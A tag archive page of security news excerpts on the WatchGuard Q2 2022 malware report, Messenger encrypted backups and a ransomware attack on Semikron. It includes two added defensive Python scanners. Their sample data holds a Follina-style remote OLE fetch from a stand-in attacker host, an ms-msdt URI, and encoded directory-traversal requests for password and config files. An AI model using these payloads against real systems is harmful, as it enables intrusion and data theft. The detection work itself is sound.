Tag Archive for: encrypted

Decrease in malware volume, but surge in encrypted malware 


There has been a reduction in overall malware detections from the peaks seen in the first half of 2021, an increase in threats for Chrome and Microsoft Office, the ongoing Emotet botnet resurgence, and much more, according to a new report. 

WatchGuard Technologies has announced findings from its most recent Internet Security Report, which details the top malware trends and network security threats analysed by WatchGuard Threat Lab researchers in Q2 2022. 

“While overall malware attacks in Q2 fell off from the all-time highs seen in previous quarters, over 81% of detections came via TLS encrypted connections, continuing a worrisome upward trend,” says Corey Nachreiner, Chief Security Officer at WatchGuard. 

“This could reflect threat actors shifting their tactics to rely on more elusive malware.”

The Q2 Internet Security Report found that Microsoft Office exploits continue to spread more widely than any other category of malware.

In fact, the quarter’s top incident was the Follina Office exploit (CVE-2022-30190), which was reported to Microsoft in April; Microsoft published workarounds at the end of May and shipped a fix in its June 2022 security updates. Delivered via a malicious document, Follina was able to circumvent Windows Protected View and Windows Defender and has been actively exploited by threat actors, including nation-state groups. Three other Office exploit signatures (CVE-2018-0802, the generic RTF-ObfsObjDat.Gen detection, and CVE-2017-11882) were widely detected in Germany and Greece.
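The report does not describe how Follina is delivered, but the public analyses of CVE-2022-30190 showed a document whose package relationships pointed at an external OLE object fetched over HTTP, which in turn invoked the ms-msdt: protocol handler. The following Python scanner, added here as an illustration and not code from WatchGuard or the report, checks an Office Open XML package for those two artefacts without trusting the (easily obfuscated) document body. The function names and the in-memory sample packages are constructed for the example; an empty result means the two patterns are absent, not that the file is safe.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_docx(docx_bytes: bytes) -> list:
    """Return human-readable findings for an Office Open XML package.

    1. any *.rels part with an oleObject Relationship whose TargetMode is
       "External" (the object is fetched from a URL when the file is opened);
    2. any part whose raw bytes contain an "ms-msdt:" URI, in case the
       payload was embedded rather than fetched.
    Ordinary hyperlinks are also external relationships and are deliberately
    not flagged, to keep the check usable on real documents.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            data = z.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(data)
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                        findings.append(f"{name}: external oleObject -> {rel.get('Target')}")
            if MSDT_RE.search(data):
                findings.append(f"{name}: contains ms-msdt: URI")
    return findings


def build_docx(rels_xml: str, body_xml: str = "<w:document/>") -> bytes:
    """Construct a minimal package in memory (enough for scan_docx; not a valid Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", body_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample relationship parts: a benign document with a hyperlink and
# an embedded (internal) OLE object, and one that fetches its OLE object remotely.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK_REL}" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL}" Target="http://attacker.invalid/payload.html!" TargetMode="External"/>
</Relationships>"""

EMBEDDED_BODY = "<w:document>ms-msdt:/id PCWDiagnostic</w:document>"

if __name__ == "__main__":
    for label, blob in (("benign", build_docx(BENIGN_RELS)),
                        ("remote-ole", build_docx(SUSPICIOUS_RELS)),
                        ("embedded-msdt", build_docx(BENIGN_RELS, body_xml=EMBEDDED_BODY))):
        print(label, scan_docx(blob))
```

The check is a triage aid, not a replacement for patching: it looks only at the relationship parts and the raw bytes, so it catches the delivery mechanism whatever the document text says, but a sample using a different external loader would pass it.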

According to the report, endpoint detections of malware were down overall, but not evenly across categories.

Despite a 20% decrease in total endpoint malware detections, malware exploiting browsers collectively increased by 23%, with Chrome seeing a 50% surge. One potential reason for the increase in Chrome detections is the number of zero-day exploits affecting the browser. Scripts continued to account for the lion's share of endpoint detections (87%) in Q2.

The top 10 signatures accounted for more than 75% of network attack detections, the report shows. This quarter saw increased targeting of ICS and SCADA systems that control industrial equipment and processes, including new signatures (WEB Directory Traversal -7 and WEB Directory Traversal -8). The two signatures are very similar; the first exploits a vulnerability first…
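A network signature for directory traversal is only as good as its handling of the encodings attackers use to slip past naive string matching. The Python check below is an added example, not WatchGuard's signature logic, of what such a detection has to cover: plain `../`, single and double percent-encoding, backslash separators, and traversal carried in a query parameter rather than the path. The access-log lines it runs over are constructed for the example, and the function names are ours.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (not from the report). The first and
# last requests are benign; the rest use plain, single-encoded, double-encoded,
# backslash and query-parameter forms of traversal against an HMI/SCADA web UI.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2022:10:01:02 +0000] "GET /hmi/index.html HTTP/1.1" 200 1203
10.0.0.7 - - [12/Jun/2022:10:01:09 +0000] "GET /hmi/../../../etc/passwd HTTP/1.1" 403 221
10.0.0.7 - - [12/Jun/2022:10:01:11 +0000] "GET /hmi/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1432
10.0.0.7 - - [12/Jun/2022:10:01:15 +0000] "GET /hmi/%252e%252e/%252e%252e/win.ini HTTP/1.1" 200 92
10.0.0.9 - - [12/Jun/2022:10:02:00 +0000] "GET /scada/..%5c..%5cconfig.xml HTTP/1.1" 200 4410
10.0.0.9 - - [12/Jun/2022:10:02:05 +0000] "GET /hmi/export?file=..%2F..%2Fconfig%2Fusers.db HTTP/1.1" 200 6000
10.0.0.5 - - [12/Jun/2022:10:02:09 +0000] "GET /scada/reports/2022..2023.csv?file=report.csv HTTP/1.1" 200 88
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded, so %2525... cannot loop forever)
    and fold backslashes to slashes so Windows-style traversal is seen too."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s.replace("\\", "/")


def escapes_root(path: str) -> bool:
    """True if resolving the '..' segments would climb above the web root.
    A '..' that stays inside the tree (/a/b/../c) is legitimate normalisation."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def has_dotdot_segment(value: str) -> bool:
    """For parameter values we cannot know the base directory, so any '..' segment counts."""
    return any(seg == ".." for seg in value.split("/"))


def is_traversal(target: str) -> bool:
    path, _, query = target.partition("?")
    if escapes_root(decode(path)):
        return True
    # parse_qs already decodes once; decode again to catch double encoding.
    for values in parse_qs(query, keep_blank_values=True).values():
        if any(has_dotdot_segment(decode(v)) for v in values):
            return True
    return False


def scan_log(text: str) -> list:
    """Return (client_ip, request_target) for every request flagged as traversal."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m["target"]):
            hits.append((m["ip"], m["target"]))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"traversal from {ip}: {target}")
```

Note that a filename such as `2022..2023.csv` is not flagged, because the check works on path segments rather than on the raw substring `..`; a substring-only signature would alert on it, and an encoding-unaware one would miss four of the five attacks in the sample.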

Source…

How To Use ChatMail: One Touch Access To Security Features – Live Demo



Facebook Messenger is testing secure storage for end-to-end encrypted chats


What you need to know

  • Meta is testing secure backups for end-to-end encrypted Messenger chats.
  • Messenger will also make chats E2E encrypted by default for some users.
  • The company is also rolling out more tests on its E2E encrypted messages.

Meta is rolling out a number of tests to make end-to-end encryption a dominant security feature in Facebook Messenger, including secure storage to back up your end-to-end encrypted chat history.

This week, Facebook began testing a secure storage feature that makes it easier to access your Messenger conversation history if you lose your device or want to restore chat history on a new phone. 

Source…

German semiconductor giant Semikron says hackers encrypted its network – TechCrunch


Semikron, a German manufacturer that produces semiconductors for electric vehicles and industrial automation systems, has confirmed it has fallen victim to a cyberattack that has resulted in data encryption.

“Semikron is already in the process of dealing with the situation so that workflows and all related processes can continue without disruption for both employees and customers as soon as possible,” a Semikron spokesperson told TechCrunch.

Semikron declined to disclose the nature of the cyberattack, but all signs point to ransomware. The semiconductor maker said in a statement that hackers claim to have “exfiltrated data from our system,” adding that the incident has led to a “partial encryption of our IT systems and files.” This suggests the malicious actor behind the attack has used the double extortion ransomware tactic, whereby cybercriminals exfiltrate a victim’s sensitive data in addition to encrypting it.

The Nuremberg-based company, which says its components power 35% of the wind turbines installed globally each year, declined to say who was behind the attack or whether it received a ransom demand. However, Bleeping Computer reports that Semikron was the victim of the LV ransomware, with the hackers apparently stealing 2 terabytes of documents.

LV ransomware has been in operation since at least 2020 and uses a modified variant of REvil ransomware, according to cybersecurity company Secureworks. The gang’s dark web leak site, which doesn’t yet list Semikron as a victim, says it targets companies that allegedly do not meet their data protection obligations.

“They rejected to fix their mistakes, they rejected to protect this data in the case when they could and had to protect it,” its dark web blog states. “These companies preferred to sell their private information, their employees’ and customers’ personal data.”

It’s unclear what data was exfiltrated from Semikron’s systems, and the company declined to say how many customers and employees are potentially impacted. Semikron has over 3,000 employees in 24 offices and 8 production sites worldwide across Germany, Brazil, China, France, India, Italy, Slovakia, and the…

Source…